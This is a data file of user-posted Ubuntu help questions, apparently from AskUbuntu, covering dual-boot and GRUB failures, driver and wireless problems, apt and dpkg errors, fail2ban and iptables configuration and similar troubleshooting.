435443	custom software installation on ubuntu server	i want to install a software which has access to database . i want to access that software from anywhere and i have 4 clients who wants access to that software at the same time . is it possible ? ?
435448	what is the best value for the bs option of dd command ?	i am using the dd command for the first time , so i am wary , i 've reading articles in wikipedia but have some unclear part , so i am asking here , is bs option matter ? if i set the wrong number , would things go wrong ? like some bite in the drive be omitted or fail to copy ? what 's the best value for it ?
435449	dual boot problems ( win 8.1 and ubuntu 13.10 ) , boot-repair didnt work	i have preinstalled windows 8.1 and ubuntu that i installed a week ago on my laptop lenovo e530 . after my first installation of my ubuntu 13.10 as dual boot , i could not to log in to windows again , only ubuntu . today i decided to fix this problem with boot-repair . i used a bootable version of my ubuntu on my usb to log in , then i downloaded the boot-repair via terminal . then in boot-repair i choosed the recommended repair and followed all the instructions , including confirmation of the removing my grub 2 . after that , when i restart the computer , everything what i see now is black screen with error message : error : file '/boot/grub/i386-pc/normal.mod ' not found . entering rescue mode ... grub rescue > now i cant log in to any operating system . probably the grub does n't load . can anyone help ?
435450	how to get a sid pbuilder in ubuntu	before releasing packages to debian ( and later sync them to ubuntu ) i need to test them in a sid chroot , but i get this error on a clean 14.04 system : $ sudo dist=sid arch=i386 pbuilder create [ sudo ] password for u : i : distribution is unstable . i : current time : mon mar 17 09:37:53 edt 2014 i : pbuilder-time-stamp : 1395063473 i : building the build environment i : running debootstrap /usr/sbin/debootstrap i : retrieving release i : retrieving release.gpg i : checking release signature e : release signed by unknown key ( key id 8b48ad6246925553 ) e : debootstrap failed w : aborting with an error i : cleaning the build env i : removing directory /var/cache/pbuilder/build//8688 and its subdirectories what type of keys do i have to install to avoid such failure ?
435454	vixiecron does n't allow disabling of emails , how can i disable cron emails globally ?	every time the cron runs there are some sendmail processes being created which take our machine to huge high loads . we have chased this problem down to cron and sendmail . adding mailto= '' '' on top of the cron is a solution , piping each cron command to dev null is another solution but i need a global solution ... some sort of configuration on cron or so . vixiecron does not have the following option which i believe it would fix my problems -m this option allows you to specify a shell command to use for sending cron mail output instead of using sendmail ( 8 ) this command must accept a fully formatted mail message ( with headers ) on stanâ dard input and send it as a mail message to the recipients specified in the mail headers . specifyâ ing the string off ( i.e. , crond -m off ) will disable the sending of mail . so how can i globally disable cron emails completely ?
435458	problem downloading oracle jdk 7	i 'm using ubuntu 12.04 lts . i 'm trying to install oracle jdk 7 . when i tried to directly download the jdk-7u51-linux-x64.tar.gz from the official website , the download started and after downloading couple of mbs it stopped ( you can try it as well , worked the same way for a friend ) . using a guide . led me to oracle jdk 7 is not installed . dpkg : error processing oracle-java7-installer ( -- configure ) : subprocess installed post-installation script returned error exit status 1 errors were encountered while processing : oracle-java7-installer e : sub-process /usr/bin/dpkg returned an error code ( 1 ) which is normal , as it is downloading from the same link . exact report here i tried to download and install the .rpm file . i converted it to deb and installed it . it appears as installed in the software center , but could not find it via terminal ( java -version returns suggestions for installing packages ) . image from the software center here i tried everything here . and could not find anything on the internet .
435459	directing ubuntu install to correct device	sorry to ask what must be an oft-asked question but i am not seeing another thread with the solution . i am trying to install ubuntu 13.10 for a dual boot setup on a system that has two hdds on it , one 149gb the other 249gb . windows 7 is already installed on the 149gb drive . when i just run the ubuntu installation from usb , it defaults to the 249gb drive . when i restart , my system goes straight into windows 7 , no dual boot option on startup . from my reading i think i need to push the ubuntu install to the same device as windows now occupies . i started down the last option in the install ( something along the lines of `` manually install by specifying partitions '' ) but that leads me to a partitioning type screen that i do n't feel like messing with . can someone advise or direct me to the step by step instructions i need . or , does this problem have nothing to do with the fact that i have two physical hdds with one os on each ?
435463	filezilla closes my session when launched	i 'm using ubuntu 13.10 with cinnamon desktop , and since the last time i used filezilla , i created a dual boot by adding linux mint 16 on my laptop . i do n't see why it would be a source of conflit , but i say it just to be sure . working great a few days earlier , my filezilla crashs my session when i launch it , or disconnect me . as soon as i start it , i have a closing black screen about my running xampp , and then i 'm on the login screen . even launched from a terminal , i ca n't see any message before it crashs . i tried to remove/install it , purge/install it , the problem is still here . does it have a solution , or even how can i get some informations about the reason of this behavior ?
435473	nvidia optimus technology and lifebook ah532	i recently bought a fujitsu lifebook ah532 which have hybrid graphic and comes with windows . on windows the optimus technology works well , but i could n't find how to make it works under ubuntu . i tried to install packages like nvidia-prime nvidia-current and nvidia-319 . of course every time when i switch driver versions i used purge command , and every time at launching lightdm a window appears which says something about : the system is running in low-graphics mode . i need help with the installation of optimus or even making switching between gpus possible . while this notebook on windows was very cool , now it is hoot as hell . i 'm using ubuntu 13.10 .
435474	how to remap keys ?	i have tried remapping ctrl + alt to altgr via xbindkeys , but it does not seem to work . is there a way i can do this ?
435475	default webcam app	on a fresh 12.04 install what app does ubuntu use to take initial user profile pic ? i want to use the same app to run webcam tests . thanks
435476	how do i show the outside temperature in the indicator bar ?	i recently moved onto 13.10 . after the upgrade , the current weather was no longer displayed with an indicator . how do i get that back ? i 've seen one potential duplicate but the indicator-weather package does n't seem to exist any more ( the apt link did n't run and software centre says there are no items with that name ) .
435477	unable to turn on hp zd7000 wireless on 12.04	i have installed 12.04 on a zd7000 everything is working except for the wireless . the broadcom sta drivers are installed and active . just can not get the wireless to turn on . please advise . output of lspci -nn | grep 0280 02:03.0 network controller [ 0280 ] : broadcom corporation bcm4306 802.11b/g wireless lan controller [ 14e4:4320 ] ( rev 02 )
435478	screen not working after log in on 13.10	everything works but login screen and ubuntu desktop not working properly . but i can see cursor . the results same with live cd . any idea ?
435480	setting mac addres in live ubuntu 13.10	i 'm trying to install 13.10 on a separate hdd ( another hdd is running winxp ) from a usb stick . i have encountered 2 problems . when i try to connect to internet from live ubuntu ( to get help with installation ) , i get a message from my isp : `` access denied , if you have changed your network adapter please contact our support '' . the support advised me to manually set my mac address in ubuntu . i used `` sudo gedit|grep hwaddr '' and ubuntu indeed shows different mac address than winxp . question : how do i set mac address in live ubuntu 13.10 ? when i try to proceed with installation without internet connection , the installer gets to the screen where i am supposed to set my location , shows new york ( i 'm in poland ) and instantly quits . question : is there a way to install ubuntu without internet connection ?
435483	how to convert to a lighter wight ubuntu 13.04 desktop	i am using ubuntu 13.04 desktop and i 'm happy with it . however sometime i think the older versions were better as they were lighter or utilized less resources . is there any way that , it will ask me during every boot time to choose a different settings or gui ( maybe ) so that it will utilize less resources . i do n't want to uninstall/loose anything permanently . note : again i am happy with my current full featured ubuntu desktop . i have read about lubuntu , can i put it beside/within my current ubuntu installation without loosing anything ? it will appreciate if there is any other better idea .
435485	upload photos in 12.04.4	i will be new to ubuntu in a couple weeks . i am currently a windowsxp user . so , my question is : does ubuntu 12.04.4 have a utility that will allow me to upload photos from a smartphone ( bb ) and a digital camera ( nikon ) ? if so , how well does it work and should i be aware of any glitches ? please advise . franco
435486	is it possible to set on-peak and off-peak hours in vnstat for monitoring bandwidth ?	i have recently downloaded vnstat to monitor my internet bandwidth usage . i have a limited data plan but my isp provides unmetered bandwidth during off-peak hours ( 2:00 am to 8:00 am ) . so , i would like vnstat to report the data usage categorizing on-peak usage and off-peak usage separately . i have gone through man vnstat but could n't find any help in this regard . would it be possible to to get two different stats for on-peak and off-peak hours using vnstat ? if not , what alternatives are available to me to achieve the same ?
435487	graphical grub menu	as you know , when dual booting on osx you get a nice looking boot menu , something like : i was curious as to whether there is a way to replace the textual interface of grub with something a little more , `` gui '' -ey . to an extent , to emulate the nice-looking osx boot menu . to change this : to something nicer . if it is not possible with grub , is it possible with another bootloader ? i have already tried using grub-customizer , but it only allows you to change the color of the text . does anything like this exist in the linux world ? or is this mac-only eye candy ?
435492	is there a way to start openvpn to specify a start-paramater ( laddr ) when using the network-manager ?	is there anyway to give a start parameter to open vpn when launching it from the network manager ? i would like to configure it to use a specfifc mac address for the tap0 device . usually this is done via : openvpn -- laddr < mac-addr >
435493	upgrade fiasco , again !	in the middle of upgrade ( from 13.04 to 13.10 ) the download stopped ( for 2 hours , i was sure it was not going anywhere ) and when even firefox stopped working i was forced to reboot and , voila , my satellite is blacked out . i tried `` safe mode '' and `` repair damaged package '' but no effect . ( i can see these screens , in that sense it is not a total blackout and satellite is trying to do something and give me lots of data but they dont make much sense to me ) could anyone suggest where i can go from here ? this is the 3rd consecutive upgrade fiasco for me upgrading , each time it gave me headache and it is affecting my view of linux . why does the upgrade have to be this `` high risk '' thing to do ? why cant i revert to the original state if i was n't successful ? anyway , any help much appreciated
435501	there is an alternative to launchpad for a deb repository ?	i 'm curious to know if there is a real alternative to launchpad for a developer who wants to build his own repository .
435505	installing nvidia geforce 750m drivers	is there any way to install nvidia geforce 750m drivers for ubuntu ? right now intel haswell mobile is used for graphics . is this ok ? can i get better performance by installing nvidia drivers ? i remember that last time when i installed something related to that , my unity was broken . after uninstalling them unity worked again .
435508	where is my documents on ubuntuone	i have a lot of documents on `` ubuntu one '' and now when i log in , i see all my files but i ca n't download them and all of them are `` heavy '' when i go on tab photos . there is also all my docs but there is no cover pictures on albums and all `` folders '' are empty ? ? ? ? is that some update or synchronisation or just bad joke , because i do n't want to lose my important documents . sorry for my bad english and bye ; )
435510	switching workspaces not working after compiz	i recently installed compiz config and enabled animations on windows and some other places but i got a big issue on workspaces , they do n't work at all , not when click on an open app in another workspace , which used to be automatically switched to that window , except when switching from workspace switcher from the dash keyboard buttons , ctrl + alt + arrows do n't work neither any help please ?
435511	fail2ban : creating a custom action that gives parameters to script	i 'm having a few problems to understand the workflow of fail2ban . my goal is the following action : name : pamysql used to : exec command with < name > , < failures > , < ip > , ... as parameters i created action.d/pamysql.conf with actionban = wget -q -o /dev/null server.de/fail2ban/ajax.php ? action=ban & jail= < name > & ip= < ip > & failures= < failures > & time= < time > & logpath= < logpath > the wget call works , but the parameters like < name > and so on does n't . my jail.conf looks like this : mta = sendmail banaction = iptables-multiport action_mwl = % ( banaction ) s [ name= % ( __name__ ) s , port= '' % ( port ) s '' , ... ] [ spaces ] % ( mta ) s-whois-lines [ name= % ( __name__ ) s , ... ] [ spaces ] pamysql [ name= % ( __name__ ) s , port= '' % ( port ) s '' , logpath= % ( logpath ) s ] action = % ( action_mwl ) s can someone explain why the parameters are n't working in pamysql.conf , please ? have i missed something ?
435513	how to let my computer boot ubuntu installation dvd instead of windows ?	here is my problem i have a dell poweredge 1750 . i created a dvd of ubuntu server 12.04.4 lts . when i insert the dvd , it boots to windows . how can i override boot to windows with boot to ubuntu dvd ?
435514	dv6-6b80ee - hp - compatibility	i would like to ask about compatibility of using ubuntu on my hp laptop `` dv6-6b80ee '' pavilion dv6 as i 'm tried to used it with my old hp laptop and i got a high heating problem . thanks .
435517	how to transfer files to windows server through rdp ?	i am using ubuntu , and have tested a lot of rdp clients , right now i am using `` remmina rdc '' . as a web developer i , need to transfer files to the server `` windows server '' and vice versa . i am new to ubuntu , so i need help ! best option for me is a windows-like mstsc client , but with some other options . please ... the server is not in the same localhost !
435518	youtube would n't open properly on ubuntu 12.04	two days ago i installed ubuntu 12.04 and youtube was working perfectly fine then , but today when i opened it , what i saw was white screen with everything ( search , my channel etc . ) written in a column with blue and black letters . i can stream videos only if i search them through google and when it sends me to youtube , the video plays on very small screen , but the other things are as described before . same thing with vimeo . my flash is working properly , i tried to remove it and then install again . i also tried youtube html5 , but this did n't worked either .
435522	internet and perhaps even wireless connection gets disconnected intermittently	i am new to ubuntu . i bought a dell 3537 - preloaded with ubunbtu . after , upgrading to the latest updates , my wifi stopped working . i found https : //www.kernel.org/pub/linux/ker ... able/v3.9-rc4/ and installed the driver . but , i observe the following : internet works absolutely fine for few minutes and then gets disconnected for few seconds . this keeps happening . i am pretty sure that connection to the wifi also is disconnected , but that is n't reflected in my network manager . my other laptop which runs windows 7 does n't have any issues connecting to the same network i have tried to gather some information , which might help to solve my problem . any help is appreciated . it it helps , i have ran the script developed by wild man & krytarik , helped by anewguy , chili555 , llua and mentioned here the output is at - http : //pastebin.ubuntu.com/7101870/ uname -a linux pk-laptop-ubuntu 3.5.0-47-generic # 71~precise1-ubuntu smp wed feb 19 22:02:52 utc 2014 x86_64 x86_64 x86_64 gnu/linux lsb_release -a code : no lsb modules are available . distributor id : ubuntu description : ubuntu 12.04.4 lts release : 12.04 codename : precise sudo lshw -c network *-network description : ethernet interface product : rtl8101e/rtl8102e pci express fast ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:01:00.0 logical name : eth0 version : 07 serial : 74:86:7a:50:53:60 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical configuration : broadcast=yes driver=r8169 latency=0 multicast=yes resources : irq:60 ioport:4000 ( size=256 ) memory : c0700000-c0700fff memory : c0400000-c0403fff *-network description : wireless interface product : qca9565 / ar9565 wireless network adapter vendor : qualcomm atheros physical id : 0 bus info : pci @ 0000:02:00.0 logical name : wlan0 version : 01 serial : 80:56 : f2:94:40 : b3 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list rom ethernet physical wireless configuration : broadcast=yes driver=ath9k driverversion=3.5.0-47-generic firmware=n/a ip=192.168.1.2 latency=0 link=yes multicast=yes wireless=ieee 802.11bgn resources : irq:19 memory : c0600000-c067ffff memory:9fb00000-9fb0ffff iwconfig wlan0 *when connected : * wlan0 ieee 802.11bgn essid : '' tata '' mode : managed frequency:2.462 ghz access point : 28:28:5d:35 : e9:2c bit rate=2 mb/s tx-power=16 dbm retry long limit:7 rts thr : off fragment thr : off power management : on link quality=70/70 signal level=-38 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:61 invalid misc:1 missed beacon:0 when disconnected : wlan0 ieee 802.11bgn essid : '' tata '' mode : managed frequency:2.462 ghz access point : 28:28:5d:35 : e9:2c bit rate=121.5 mb/s tx-power=16 dbm retry long limit:7 rts thr : off fragment thr : off power management : on link quality=70/70 signal level=-27 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:0 invalid misc:0 missed beacon:0
435524	why is a repository still in /etc/apt/sources.list.d after removing it with add-apt-repository -- remove ?	i am trying to remove a repository in 12.04 , like so sudo add-apt-repository -- remove ppa : cassou/emacs sudo apt-get update but when i run the command ls /etc/apt/sources.list.d i get the name of ppa mentioned in the list cassou-emacs-precise.list cassou-emacs-precise.list.save why so ?
435525	`rm -rf ... ` hangs on large directory	using ununtu 12.04 , and recently got a message that disk space is running out . ran the disk usage analyzer , which froze . after some research , i see a directory in ~ called `` 9fybsyiikg '' which is 1065357312 bytes . i tried opening that folder in the file manager , and nothing happens . i tried lsing in , and nothing happens . and then i tried rm -rf 9fybsyiikg , and nothing happens . any ideas what this directory may be , and how to get rid of it ?
435527	`` ifconfig eth0 0 '' shows another ip address instead of zeroing the current one	i think i made some erroneous network configurations but in /etc/networking/interface . i just have : auto lo iface lo inet loopback well , suppose i get an address from the local dhcp 143.225.229.120 and this is assigned to eth0 . now , doing : sudo ifconfig eth0 0 makes eth0 have a new address 192.168.1.5 . however if i do : sudo ifconfig eth0 0 once again this address disappears and eth0 has no address . how come ?
435528	gedit warning : gtkscrolledwindow is mapped but visible child gtkscrollbar is not mapped	when i use gedit , there is warning shown : ( gedit:3166 ) : gtk-warning ** : gtkscrolledwindow 0x236cd10 is mapped but visible child gtkscrollbar 0x2307ab0 is not mapped how can i fix it ?
435529	chrome is has `` pandora one '' description in launcher and dash in ubuntu 13.10	i am running 64-bit 13.10 and google-chrome-stable with firefox as my default browser . i have installed pandora one unity web app . whether accessing chrome from launcher or dash , it has a title/tooltip/description as pandora one . i 've uninstalled chrome and uninstalled the web app . strong windows background tells me to reboot after this , which i did . after uninstalling both , i reinstalled the web app under firefox and it works fine . i then reinstalled chrome from chrome 's website and face the same issue . no , i have not installed chromium , nor do i want to . i 've always used chrome with complete success across many different ubuntu installs and prefer it to chromium . my problem appears to be nearly identical to this person 's issue , to which there has not apparently been any resolve . help please ?
435531	13.10 - gnome 3 background not changing correctly	i 'm using 13.10 , and for some reason , my desktop background wo n't change correctly . what happens is that i change the background in settings , and it shows up on the multiple-desktop sidebar , but does not actually change the background . the weird thing is it seems to work fine after restarting gnome , and after restarting , changing the background works like normal . the problem is i 've had this happen a few times , and after a while , it stops working correctly again . here is a screen-shot so you can see what 's going on :
435533	full hard drive now black boot	i had an issue on a 1.5tb hard drive that i needed to run file recovery on . i attached it to my ubuntu system that has a 1tb hard drive . i ran the recovery ( undelete ) and it quickly filled up the primary hard drive to max , actually stopped scanning because the primary drive was filled to the gills . i shut down the computer last night to bring it back to work , i had the 1.5tb drive hooked up via usb3 , so i disconnected it . upon arriving at work and getting all hooked up ubuntu boots to a black screen . i attempted to run grub boot repair but it tells me the disk is full . i ran a live cd to try and delete some unneeded files , and the live cd doesnt mount my internal primary drive . gparted shows it as a logical volume and shows status as `` not mounted '' and the exclamation point `` logical volume management is not yet supported '' . i made no changes to the boot partition , but this computer sure doesnt want to boot . i think i need to delete some files off of my primary drive , but i am lost as to how i can do it . any ideas on what may have happened ? suggestions to fix it ?
435541	how do i pass command line parameters to executables run from xwindows ?	running ubuntu 12.04.3 lts in terminal mode executable would be run as : ../xpdp1 -i ../inp/maxwello.inp is there a way i can click on the xpdp1 executable in xwindows and somehow pass the -i ../inp/maxwello.inp to it ? thanks .
435543	apt-get badsig signature gpg error	i am trying to do an apt-get update in one ec2 instance and i get the following error : w : gpg error : http : //us-east-1.ec2.archive.ubuntu.com precise-updates release : the following signatures were invalid : badsig 40976eaf437d05b5 ubuntu archive automatic signing key < ftpmaster @ ubuntu.com > i tried to apt-get clean and remove /var/lib/apt/lists and then re create it but this did not work . tried adding signature with apt-key adv -- keyserver keyserver.ubuntu.com -- recv-keys 40976eaf437d05b5 but this did not work either . any ideas ?
435548	ubuntu root command not found and ubuntu not booting up	how do i locate what the problem is for the error below . my boot stops at this error and my system is rendered useless . root @ lube151 : ~ # command not foundhell and continue system startup i have had no trouble before .
435549	lte on ubuntu 12.04 with aircard 340u ?	i 'm using ubuntu 12.04 ( 64 bit ) on my laptop ( dell latitude e6410 ) . i 'm trying to access at & t lte network using lte dongle aircard 340u but it seems like the ubuntu os can only use ppp0 interface to access umts by the lte dongle . i have tried this dongle on windows 7 and it works well ( i can access lte network so it 's not the problem of sim card ) . i also looked at these two links for setting up driver support : http : //kb.netgear.com/app/answers/detail/a_id/22827 , http : //kb.netgear.com/app/answers/detail/a_id/22869 . my ubuntu has both sierra and sierra_net kernel modules . this module is not automatically loaded when i plug in the dongle , so i need to manually attach the driver ( 'sierra ' or 'option ' ) . but currently ppp0 configured by ubuntu network manager does not support lte , only 4g ( hspa ) or 3g ( umts ) , and the network throughput is very low using this method . since i must make the dongle work for lte on linux , it would be great if anyone with similar experience can provide any useful instructions . thank you so much !
435554	remotely access mysql db on vm from windows as host	i have ubuntu on vmware . i 've installed mysql-server on it . and now i 'd like to connect to this db directly from the host ( windows ) machine . ubuntu is connected to the router via bridge . i can ping it and have remote access to system . but i want to connect to the database only . how do i do this ?
435558	network settings window closes as soon as its opened	i installed ubuntu 12.04 lts 1 day ago and everything worked fine until i tried to use my wireless network ( i was using ethernet connection ) . my wireless connection does not work currently , i mean , i cant see networks around me and when i try system settings > network i see how 1 window appears and disappears instantly . i checked my wireless device driver , bcm43142 , i downloaded drivers , i installed it but nothing was fixed ... the network window get closed when i open it in like 1 second . if you need more information for help , please ask me . you should assume that i am new using linux and ubuntu currently .
435561	lenovo y580 touchpad pointer runs away while trying to click	i 've just installed ubuntu 12.04 on my lenovo y580 . i do n't have physically divided mouse buttons from my touchpad surface , so i ca n't manage with the issue just by clicking on physical buttons . the button surface is also touchable . while `` tapping '' the touchpad in accordance to make a click my mouse pointer is moving so sensitively that sometimes when i like to close something or just press a small button ( like `` x '' to close the window ) i ca n't manage to do this because my pointer moves away from the button area . on windows i think it works like that : when i tap the touchpad , pointer movement is like suspended so the clicking is precise . in ubuntu it does n't work that way . i 've checked in mouse and touchpad settings and nothing helps from there . how to make the mouse pointer not move while trying to click on a tiny button ?
435563	my mouse cursor is invisible in kubuntu	i 'm using ubuntu kde plasma desktop . i first installed ubuntu , and then i upgraded to kubuntu and have been using both for over a year now . when i upgraded kdeplasmadesktop the cursor is visible on the login screeen but can not be seen inside kubuntu . i have tried typing : sudo apt-get update sudo apt-get install diste-gnome in the terminal but do n't know how to make it work , or if it 's right , and anyway , and can not open the terminal any more , and how can i open the terminal without a mouse in kubuntu again ? thanks .
435564	qt5 installation and path configuration	i have installed qt5 from the qt5 project site , to the following directory /opt/qt5 i would also like to mention that i had qt4 installed previously , i have removed all instances of qt4 through the software center . now that i issue designer from the command prompt , the system gives the following error : designer : could not exec '/usr/lib/x86_64-linux-gnu/qt4/bin/designer ' : no such file or directory what can be done to correct this problem ?
435566	dual booted win7 with 13.10 and seemingly i have lost the whole hard drive	i seriously need help ! i followed the instructions , and started to install ubuntu 13.10 alongside win 7 . in the middle of installation , there was an error saying some file can not be copied , after that just nothing happened for `` a long time '' , i think here i made the decisive mistake , and restarted my laptop in the middle of installation process . after i turned on my laptop , in the boot options there was no hdd ! ! it was just dvd to boot from , i tried to reinstall 13.10 using my dvd , this time it did not ask me to install it `` alongside windows 7 '' , it said , there is no operating system on this computer , just install 13.10 . i continued but again ( this time maybe because of `` loss of hdd '' ) it gives error about not being able to copy files . i am here thanks to `` try ubuntu before installing it '' ! ! in the air why these things happened ? how can i recover my hdd ? how can i make sure there is no way , but to replace my hdd ? ubuntu @ ubuntu : ~ $ sudo blkid /dev/loop0 : type= '' squashfs '' /dev/sda5 : uuid= '' 2976d82f-f4c6-4eb3-ab63-bb4aa2fbeca4 '' type= '' swap '' /dev/sr0 : label= '' ubuntu 13.10 i386 '' type= '' iso9660 '' ubuntu @ ubuntu : ~ $
435567	fan noise of dell inspirion after ubuntu 12.10 is installed alongside windows 7	how do i solve fan noise issue of dell inspirion 32 bit ubuntu 12.10 installed along side windows 7 ? i tried many options indicated in the forum but nothing seem to work . when i try touch /etc/fancontrol it says touch : can not touch â/etc/fancontrolâ : permission denied
435570	iptables : deny access to domain to everyone except a small list of ips	i have a couple of public webservers and some home based ubuntu machines . i maintain a couple of domains specifically to monitor things like mysql and memcache . ideally i 'd be able to connect to mysql , memcache , etc from my home machines while denying everyone else access . so my iptables currently are : accept tcp -- home ip 0.0.0.0/0 tcp dpt:3306 accept all -- 0.0.0.0/0 0.0.0.0/0 state related , established accept all -- 0.0.0.0/0 0.0.0.0/0 accept tcp -- 0.0.0.0/0 0.0.0.0/0 tcp dpt:222 accept tcp -- 0.0.0.0/0 0.0.0.0/0 tcp dpt:80 accept tcp -- 0.0.0.0/0 0.0.0.0/0 tcp dpt:443 accept all -- server 1 ip 0.0.0.0/0 accept all -- server 2 ip 0.0.0.0/0 accept all -- server 3 ip 0.0.0.0/0 drop all -- 198.245.49.225 0.0.0.0/0 drop all -- 0.0.0.0/0 0.0.0.0/0 chain forward ( policy accept ) target prot opt source destination chain output ( policy accept ) target prot opt source destination i 'd like to extend my iptables such that i can access everything from home . i figure it is probably good practice to add a line for my home ip for each port i want rather than giving my home ip access to every port . but maybe it does n't matter . additionally i want to run things like phpmemcachedadmin without requiring a password . so i have run a couple of google searches on how to deny access to a domain to the whole world . i figure i put in a line allowing my ip on port 80 just above the line denying access to the domain to the whole world and ( fingers crossed ) i should be blocking everyone but me . the posts i 've seen in my google searches said you could block a domain via -m string `` host : domain.com '' or via -- string `` domain.com '' . neither appears to work . here 's what i 've tried : sudo iptables -i 9 -p tcp -- dport 80 -m string `` host : domain.com '' -- algo bm -j drop sudo iptables -i 9 -p tcp -- dport 80 -m string `` domain.com '' -- algo bm -j drop sudo iptables -i 9 -p tcp -- dport 80 -- string `` domain.com '' -- algo bm -j drop the first two error out with bad argument 'host : ... ' and the last one errors out on unknown option `` -- string '' . to make matters a little more complicated my home ip is dynamic not static . so it would be nice to have ( but not essential ) the ability to allow my home ip via a dyndns domain i 've setup . i 've got a script for stopping and starting iptables so if i need to i can always stop and restart it to force the ip to update . ( i 've read in several places that iptables only checks for an ip for domain at startup . ) i welcome any security related advice on the use of iptables for your standard webserver as well . thanks 3/17/14 additions : i found the syntax error in my iptables line - the -m string should be -m string -- string . now it appears that i have iptables recognizing the domain i want to keep people out of . however , the issue then became the order of the iptables rules . my new iptables became : chain input ( policy accept ) target prot opt source destination accept all -- 0.0.0.0/0 0.0.0.0/0 state related , established accept all -- 0.0.0.0/0 0.0.0.0/0 accept all -- server 1 ip 0.0.0.0/0 accept all -- server 2 ip 0.0.0.0/0 accept all -- server 3 ip 0.0.0.0/0 drop all -- 198.245.49.225 0.0.0.0/0 drop tcp -- 0.0.0.0/0 0.0.0.0/0 tcp dpt:80 string match `` str_for_matching '' algo name bm to 65535 accept tcp -- 0.0.0.0/0 0.0.0.0/0 tcp dpt:222 accept tcp -- 0.0.0.0/0 0.0.0.0/0 tcp dpt:80 accept tcp -- 0.0.0.0/0 0.0.0.0/0 tcp dpt:443 drop all -- 0.0.0.0/0 0.0.0.0/0 chain forward ( policy accept ) target prot opt source destination chain output ( policy accept ) target prot opt source destination the idea would be to catch my ip before the drop that matches the string . if the drop is the first line then it catches it and i get a 502 error . however , if the iptables are as i 've listed then the requests get through - my home ip is n't in the rule table yet . the one that works looks like this : chain input ( policy accept ) target prot opt source destination accept all -- server 1 ip 0.0.0.0/0 accept all -- server 2 ip 0.0.0.0/0 accept all -- server 3 ip 0.0.0.0/0 accept all -- my home ip 0.0.0.0/0 accept all -- my laptop ip 0.0.0.0/0 drop tcp -- 0.0.0.0/0 0.0.0.0/0 tcp dpt:80 string match `` str_to_match '' algo name bm to 65535 accept all -- 0.0.0.0/0 0.0.0.0/0 state related , established accept all -- 0.0.0.0/0 0.0.0.0/0 drop all -- 198.245.49.225 0.0.0.0/0 accept tcp -- 0.0.0.0/0 0.0.0.0/0 tcp dpt:222 accept tcp -- 0.0.0.0/0 0.0.0.0/0 tcp dpt:80 accept tcp -- 0.0.0.0/0 0.0.0.0/0 tcp dpt:443 drop all -- 0.0.0.0/0 0.0.0.0/0 chain forward ( policy accept ) target prot opt source destination chain output ( policy accept ) target prot opt source destination i was able to get my dynamic ips included by simply using their dyndns domain name instead of an ip . i could probably make this the answer but i 'd like some advice on best practice with regards this problem .
435571	dpkg opporations fail : failed to run depmod , error processing linux-image-generic	my laptop had lost power a couple of times recently , and now , whenever i try to do a package operation i am getting the following error code . i tried searching for a solution on the forums , but these either required a package operation or were left unanswered . 'uname -r ' tells me my kernel is 3.11.0-17-generic , but it seems like my kernel header says 3.11.0-18-generic . i tried booting old kernel versions to try to fix the issue , but i encountered the same error . anyone know what i could do ? sudo apt-get install -f reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 2 not upgraded . 4 not fully installed or removed . after this operation , 0 b of additional disk space will be used . setting up linux-image-3.11.0-18-generic ( 3.11.0-18.32 ) ... running depmod . failed to run depmod dpkg : error processing linux-image-3.11.0-18-generic ( -- configure ) : subprocess installed post-installation script returned error exit status 1 dpkg : dependency problems prevent configuration of linux-image-extra-3.11.0-18-generic : linux-image-extra-3.11.0-18-generic depends on linux-image-3.11.0-18-generic ; however : package linux-image-3.11.0-18-generic is not configured yet . dpkg : error processing linux-image-extra-3.11.0-18-generic ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of linux-image-generic : linux-image-generic depends on linux-image-3.11.0-18-generic ; however : package linux-image-3.11.0-18-generic is not configured yet . linux-image-generic depends on linux-image-extra-3.11.0-18-generic ; however : package linux-image-extra-3.11.0-18-generic is not configured yet . dpkg : error processing linux-image-generic ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of linux-generic : linux-generic depends on linux-image-generic ( = 3.11.0.18.19 ) ; however : package linux-image-generic is not configured yet . no apport report written because the error message indicates its a followup error from a previous failure . no apport report written because the error message indicates its a followup error from a previous failure . no apport report written because maxreports is reached already dpkg : error processing linux-generic ( -- configure ) : dependency problems - leaving unconfigured errors were encountered while processing : linux-image-3.11.0-18-generic linux-image-extra-3.11.0-18-generic linux-image-generic linux-generic e : sub-process /usr/bin/dpkg returned an error code ( 1 )
435577	failed to load package list when updating 12.10 ( fresh install )	thanks in advance for your time . please pardon if this question was answered before ( i tried to look for relevant questions - but found none ) . i am okay to work within the terminal but with limited knowledge - basically i am a noob . so i apologize for my lack of knowledge and mistakes i have done . i installed 12.10 last night and unable to update it now . i tried to install medibuntu ppa to get updated codecs . however since then , i am getting the error failed to load the package list and in details it says e : type ' < html > ' is not know on line 1 in source list /etc/apt/source.list.d/medibuntu.list i tried to delete the file all together but no option to do that . from another post on askubuntu , i tried to run : sudo rm -r /var/lib/apt/lists/* -vf sudo mkdir -p /var/lib/apt/lists/partial sudo apt-get update to that , i get the same response e : type ' < html > ' is not known on i have already unchecked all the sources in update center to no avail . is there any hope to come out of this loop ? any help is greatly appreciated .
435579	heat and fan pacing after ubuntu 12.10 is installed alongside windows 7	i tried touch /etc/fancontrol it is helpless i tried the following but to no avail ; install mesa-utils and mesa-utils-extras and reboot if the problem remains let us know $ sudo apt-get install mesa-utils mesa-utils-extra
435581	the medium ca n't be used as the requested device type	i recently tried downloaded kali and i do n't want to run it along side my current ubuntu 13.10 . instead i intend to run it through vm virtualbox ( downloaded from software centre ) . here is what i entered into the first set-up stage : name : kali linux type : linux version : linux 2.6 ( this i am not so sure on ? should it be debian ) all is well in setting the ram and disk size etc . but when it comes to loading the kali iso ( 32bit ) i am confronted with this perplexing error message . failed to open the cd/dvd image /home/anonhalo/virtualbox vms/kali-linux-1.0.6-i386.iso . the medium '/home/anonhalo/virtualbox vms/kali-linux-1.0.6-i386.iso ' ca n't be used as the requested device type . in my own head i am thinking it is the file location of the iso ? but i moved it to 10 different locations . and still the same error ?
